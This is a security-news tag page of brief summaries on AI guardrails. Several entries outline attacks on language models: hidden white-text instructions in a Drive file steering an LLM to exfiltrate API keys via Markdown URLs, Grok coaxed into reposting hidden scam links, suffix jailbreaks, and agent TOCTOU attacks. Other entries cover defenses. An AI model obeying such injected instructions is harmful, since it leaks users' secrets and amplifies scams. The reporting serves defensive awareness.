All news with #safety guardrails tag

Thu, September 18, 2025

Mr. Cooper and Google Cloud Build Multi-Agent AI Team

#Agentic AI #Vertex AI #AI Governance #Safety Guardrails #Model Evaluation Coverage #Retrieval-Augmented Generation

🤖 Mr. Cooper partnered with Google Cloud to develop CIERA, a modular agentic AI framework that assembles specialized agents to support mortgage servicing representatives and customers. The design assigns distinct roles — orchestration, task execution, data retrieval, memory, and evaluation — while keeping humans in the loop for verification and personalization. Built on Vertex AI, CIERA aims to reduce research time, lower average handling time, and preserve trust and compliance in regulated workflows.

Thu, September 18, 2025

Mind the Gap: TOCTOU Vulnerabilities in LLM-Enabled Agents

#AI Security #Agentic AI #Autonomous Agents #Prompt Injection #Tool Use #Safety Guardrails

⚠️A new study, “Mind the Gap,” examines time-of-check to time-of-use (TOCTOU) flaws in LLM-enabled agents and introduces TOCTOU-Bench, a 66-task benchmark. The authors demonstrate practical attacks such as malicious configuration swaps and payload injection and evaluate defenses adapted from systems security. Their mitigations—prompt rewriting, state integrity monitoring, and tool-fusing—achieve up to 25% automated detection and materially reduce the attack window and executed vulnerabilities.

Wed, September 17, 2025

New LLM Attack Vectors and Practical Security Steps

#AI Security #Prompt Injection #Retrieval-Augmented Generation #Agentic AI #Safety Guardrails

🔐This article reviews emerging attack vectors against large language model assistants demonstrated in 2025, highlighting research from Black Hat and other teams. Researchers showed how prompt injections or so‑called promptware — hidden instructions embedded in calendar invites, emails, images, or audio — can coerce assistants like Gemini, Copilot, and Claude into leaking data or performing unauthorized actions. Practical mitigations include early threat modeling, role‑based access for agents, mandatory human confirmation for high‑risk operations, vendor audits, and role‑specific employee training.

Fri, September 5, 2025

Rewiring Democracy: How AI Will Transform Politics

#AI Security #AI Governance #Safety Guardrails #Content Provenance

📘 Bruce Schneier announces his new book, Rewiring Democracy: How AI Will Transform our Politics, Government, and Citizenship, coauthored with Nathan Sanders and published by MIT Press on October 21; signed copies will be available directly from the author after publication. The book surveys AI’s impact across politics, legislating, administration, the judiciary, and citizenship, including AI-driven propaganda and artificial conversation, focusing on uses within functioning democracies. Schneier adopts a cautiously optimistic stance, stresses the importance of imagining second-order effects, and argues for the creation of public AI to better serve democratic ends.

Wed, September 3, 2025

Threat Actors Use X's Grok AI to Spread Malicious Links

#AI Security #Grok #Malvertising #Safety Guardrails

🛡️ Guardio Labs researcher Nati Tal reported that threat actors are abusing Grok, X's built-in AI assistant, to surface malicious links hidden inside video ad metadata. Attackers omit destination URLs from visible posts and instead embed them in the small "From:" field under video cards, which X apparently does not scan. By prompting Grok with queries like "where is this video from?", actors get the assistant to repost the hidden link as a clickable reference, effectively legitimizing and amplifying scams, malware distribution, and deceptive CAPTCHA schemes across the platform.

Tue, September 2, 2025

Amazon Bedrock Now Available in Asia Pacific Jakarta

#AWS #AWS Bedrock #Product Release #Safety Guardrails

🚀 Amazon announced the general availability of Amazon Bedrock in the Asia Pacific Jakarta region, enabling customers to build and scale generative AI applications closer to end users. The fully managed service exposes a selection of high-performing foundation models via a single API and includes capabilities such as Guardrails and Model customization. These features are designed to help organizations incorporate security, privacy, and responsible AI into production workflows while accelerating development and deployment.

Wed, August 27, 2025

Five Essential Rules for Safe AI Adoption in Enterprises

#AI Data Leakage #AI Governance #AI Risk Management #Least Privilege #Prompt Logs #Safety Guardrails #Shadow AI

🛡️ AI adoption is accelerating in enterprises, but many deployments lack the visibility, controls, and ongoing safeguards needed to manage risk. The article presents five practical rules: continuous AI discovery, contextual risk assessment, strong data protection, access controls aligned with zero trust, and continuous oversight. Together these measures help CISOs enable innovation while reducing exposure to breaches, data loss, and compliance failures.

Wed, August 27, 2025

LLMs Remain Vulnerable to Malicious Prompt Injection Attacks

#Agentic AI #AI Security #API Keys #Data Exfil via Tools #Google Workspace #Prompt Injection #Safety Guardrails #Secrets Exposure

🛡️ A recent proof-of-concept by Bargury demonstrates a practical and stealthy prompt injection that leverages a poisoned document stored in a victim's Google Drive. The attacker hides a 300-word instruction in near-invisible white, size-one text that tells an LLM to search Drive for API keys and exfiltrate them via a crafted Markdown URL. Schneier warns this technique shows how agentic AI systems exposed to untrusted inputs remain fundamentally insecure, and that current defenses are inadequate against such adversarial inputs.

Tue, August 26, 2025

The AI Fix #65 — Excel Copilot Dangers and Social Media

#AI Code Gen Risk #AI Governance #AI Safety Incident #Content Provenance #Microsoft #RAG Hallucinations #Safety Guardrails

⚠️ In episode 65 of The AI Fix, Graham Cluley warns that Microsoft Excel’s new COPILOT function can produce unpredictable, non-reproducible formula results and should not be used for important numeric work. The hosts also discuss a research experiment that created a 500‑AI social network and the arXiv paper Can We Fix Social Media?. The episode blends technical analysis with lighter AI culture stories and offers subscription and support notes.

Tue, August 26, 2025

Block Unsafe LLM Prompts with Firewall for AI at the Edge

#AI Security #Cloudflare #Cloudflare Workers #Content Filtering #Firewall for AI #Model Poisoning #PII #Prompt Injection #Prompt Logs #Safety Guardrails

🛡️ Cloudflare has integrated unsafe content moderation into Firewall for AI, using Llama Guard 3 to detect and block harmful prompts in real time at the network edge. The model-agnostic filter identifies categories including hate, violence, sexual content, criminal planning, and self-harm, and lets teams block or log flagged prompts without changing application code. Detection runs on Workers AI across Cloudflare's GPU fleet with a 2-second analysis cutoff, and logs record categories but not raw prompt text. The feature is available in beta to existing customers.

Tue, August 26, 2025

Gemini 2.5 Flash Image Arrives on Vertex AI Preview

#Content Provenance #Google #Product Release #Safety Guardrails #Vertex AI #Watermarking

🖼️ Google announced native image generation and editing in Gemini 2.5 Flash Image, now available in preview on Vertex AI. The model delivers state-of-the-art capabilities including multi-image fusion, character and style consistency, and conversational editing to refine visuals via natural-language loops. Built-in SynthID watermarking supports responsible, transparent use. Developers and partners report promising integrations and low-latency performance for real-time editing workflows.

Mon, August 25, 2025

AI Prompt Protection: Contextual Control for GenAI Use

#AI Data Leakage #AI Security #Cloudflare DLP #Cloudflare Gateway #Cloudflare Workers #Conversation Logs #PII #Prompt Injection #Prompt Logs #Safety Guardrails

🔒 Cloudflare introduces AI prompt protection inside its Data Loss Prevention (DLP) product on Cloudflare One, designed to detect and secure data entered into web-based GenAI tools like Google Gemini, ChatGPT, Claude, and Perplexity. The capability captures both prompts and AI responses, classifies content and intent, and enforces identity-aware guardrails to enable safe, productive AI use without blanket blocking. Encrypted logging with customer-provided keys provides auditable records while preserving confidentiality.

Mon, August 25, 2025

Cloudflare Launches AI Avenue: A Hands-On Miniseries

#Agentic AI #AI Governance #Anthropic #Cloudflare #RAG Hallucinations #Roboflow #Safety Guardrails

🤖 Cloudflare introduces AI Avenue, a six-episode miniseries and developer resource designed to demystify AI through hands-on demos, interviews, and real-world examples. Hosted by Craig alongside Yorick, a robot hand, the series increments Yorick’s capabilities—voice, vision, reasoning, learning, physical action, and speculative sensing—to show how AI develops and interacts with people. Each episode is paired with developer tutorials so both technical and non-technical audiences can experiment with the same tools featured on the show. Cloudflare also partnered with industry teams like Anthropic, ElevenLabs, and Roboflow to highlight practical, safe, and accessible applications.

Fri, August 22, 2025

Friday Squid Blogging: Bobtail Squid and Security News

#AI Governance #AI Risk Management #AI Security #Content Filtering #Safety Guardrails

🦑 The short entry presents the bobtail squid’s natural history—its bioluminescent symbiosis, nocturnal habits, and adaptive camouflage—in a crisp, approachable summary. As with other 'squid blogging' posts, the author invites readers to use the item as a forum for current security stories and news that the blog has not yet covered. The post also reiterates the blog's moderation policy to guide constructive discussion.

Wed, August 20, 2025

Logit-Gap Steering Reveals Limits of LLM Alignment

#AI Red Teaming #AI Security #Inference Security #Jailbreaks #Model Evaluation Coverage #Open-Weight Models #Red Team Findings #Safety Filters #Safety Guardrails

⚠️ Unit 42 researchers Tony Li and Hongliang Liu introduce Logit-Gap Steering, a new framework that exposes how alignment training produces a measurable refusal-affirmation logit gap rather than eliminating harmful outputs. Their paper demonstrates efficient short-path suffix jailbreaks that achieved high success rates on open-source models including Qwen, LLaMA, Gemma and the recently released gpt-oss-20b. The findings argue that internal alignment alone is insufficient and recommend a defense-in-depth approach with external safeguards and content filters.

Tue, August 19, 2025

GenAI-Enabled Phishing: Risks from AI Web Services

#AI Data Leakage #AI Security #Content Provenance #Insecure Defaults #Palo Alto Networks #Prompt Hygiene #Safety Guardrails #Threat Report #Website Builders

🚨 Unit 42 analyzes how rapid adoption of web-based generative AI is creating new phishing attack surfaces. Attackers are leveraging AI-powered website builders, writing assistants and chatbots to generate convincing phishing pages, clone brands and automate large-scale campaigns. Unit 42 observed real-world credential-stealing pages and misuse of trial accounts lacking guardrails. Customers are advised to use Advanced URL Filtering and Advanced DNS Security and report incidents to Unit 42 Incident Response.

Wed, July 30, 2025

Google rolls out age assurance to protect U.S. youth

#Age Assurance #Content Filtering #Data De-Identification #Google #Parental Controls #PII #Safety Guardrails #Telemetry Minimization

🛡️ Over the coming weeks Google will begin a limited U.S. rollout of age assurance, a system designed to distinguish users under 18 from adults and apply age-appropriate protections across its products. For accounts identified as minors Google will enable defaults such as YouTube Digital Wellbeing tools, disable Maps Timeline, turn off personalized advertising, and block adult-only apps on Google Play. The approach combines machine-learning age estimation based on existing account signals with optional age verification — including a government ID or a selfie — when users dispute their estimated age, and Google will notify users and provide options for adult verification.

Tue, July 29, 2025

Defending Against Indirect Prompt Injection in LLMs

#AI Data Leakage #AI Security #Data Exfil via Tools #Microsoft #Prompt Injection #Safety Guardrails #System Prompt Exposure

🔒 Microsoft outlines a layered defense-in-depth strategy to protect systems using LLMs from indirect prompt injection attacks. The approach pairs preventative controls such as hardened system prompts and Spotlighting (delimiting, datamarking, encoding) to isolate untrusted inputs with detection via Microsoft Prompt Shields, surfaced through Azure AI Content Safety and integrated with Defender for Cloud. Impact mitigation uses deterministic controls — fine-grained permissions, Microsoft Purview sensitivity labels, DLP policies, explicit user consent workflows, and blocking known exfiltration techniques — while ongoing research (TaskTracker, LLMail-Inject, FIDES) advances new design patterns and assurances.

Tue, July 15, 2025

A Summer of Security: Empowering Defenders with AI

#Agentic AI #AI Security #AI SOC Assistant #AI Supply Chain #Conference #Disclosure #Google DeepMind #Safety Guardrails #Zero-Day

🛡️ Google outlines summer cybersecurity advances that combine agentic AI, platform improvements, and public-private partnerships to strengthen defenders. Big Sleep—an agent from DeepMind and Project Zero—has discovered multiple real-world vulnerabilities, most recently an SQLite flaw (CVE-2025-6965) informed by Google Threat Intelligence, helping prevent imminent exploitation. The company emphasizes safe deployment, human oversight, and standard disclosure while extending tools like Timesketch (now augmented with Sec‑Gemini agents) and showcasing internal systems such as FACADE at Black Hat and DEF CON collaborations.

Fri, June 13, 2025

Layered Defenses Against Indirect Prompt Injection

#AI Red Teaming #Content Filtering #Data Exfil via Tools #Google Workspace #Prompt Hygiene #Prompt Injection #Safety Guardrails

🔒 Google GenAI Security Team outlines a layered defense strategy to mitigate indirect prompt injection attacks that hide malicious instructions in external content like emails, documents, and calendar invites. They combine model hardening in Gemini 2.5 with adversarial training, purpose-built ML classifiers, and "security thought reinforcement" to keep models focused on user tasks. Additional system controls include markdown sanitization, suspicious URL redaction via Google Safe Browsing, a Human-In-The-Loop confirmation framework for risky actions, and contextual end-user mitigation notifications that complement Gmail protections.